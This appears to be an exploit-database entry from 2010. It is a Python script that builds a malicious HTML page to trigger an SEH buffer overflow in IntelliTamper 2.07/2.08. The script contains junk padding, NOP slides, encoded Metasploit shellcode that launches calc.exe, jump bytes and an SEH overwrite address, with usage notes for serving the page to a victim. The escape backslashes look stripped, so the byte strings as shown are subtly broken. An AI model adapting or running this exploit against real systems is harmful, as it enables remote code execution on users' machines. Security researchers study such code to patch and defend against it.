IntelliTamper 2.07/2.08 (SEH) Remote Buffer Overflow :

Date : 2010-01-22 Author : loneferret
# IntelliTamper 2.07/2.08 (SEH) Remote Buffer Overflow
# Based on PoC: http://www.exploit-db.com/exploits/11217
# Author: loneferret
# Big thanks to: dookie
# Tested on WinXP SP3 English

# Just copy the resulting html file on a web server, and point Intelli Tamper to that adress.
# Should get a calculator

# Thanks to dookie for telling me to stick to it.
# Exploit-DB : Try Harder (tm)


#!/usr/bin/python
#badchar list: x00x3Cx01
buffer = '<html><head><title>loneferret test</title></head><body>'
buffer += '<script defer="'

buffer += 'x41' * 6236 # junk
buffer += 'x90' * 180 # nop slide 1

# win32_exec -
# EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */

buffer += 'x2bxc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x4d'
buffer += 'x53x9exc5x83xebxfcxe2xf4xb1xbbxdaxc5x4dx53x15x80'
buffer += 'x71xd8xe2xc0x35x52x71x4ex02x4bx15x9ax6dx52x75x8c'
buffer += 'xc6x67x15xc4xa3x62x5ex5cxe1xd7x5exb1x4ax92x54xc8'
buffer += 'x4cx91x75x31x76x07xbaxc1x38xb6x15x9ax69x52x75xa3'
buffer += 'xc6x5fxd5x4ex12x4fx9fx2exc6x4fx15xc4xa6xdaxc2xe1'
buffer += 'x49x90xafx05x29xd8xdexf5xc8x93xe6xc9xc6x13x92x4e'
buffer += 'x3dx4fx33x4ex25x5bx75xccxc6xd3x2exc5x4dx53x15xad'
buffer += 'x71x0cxafx33x2dx05x17x3dxcex93xe5x95x25xa3x14xc1'
buffer += 'x12x3bx06x3bxc7x5dxc9x3axaax30xffxa9x2ex7dxfbxbd'
buffer += 'x28x53x9exc5'

buffer += 'x90' * 243 # nop slide 2

buffer += 'xE9x55xFExFFxFF'# jumps back in nop slide 1
buffer += 'xebxd0x90x90' # small jump back in nop slide 2
buffer += 'x3bx10x40x00' # 0x0040103b intellitamper.exe

buffer += 'x43' * 50

buffer += '">'
buffer + '</body></html>'
file=open('index.html','w')
file.write(buffer)
file.close()

C1

 

C2

 

C3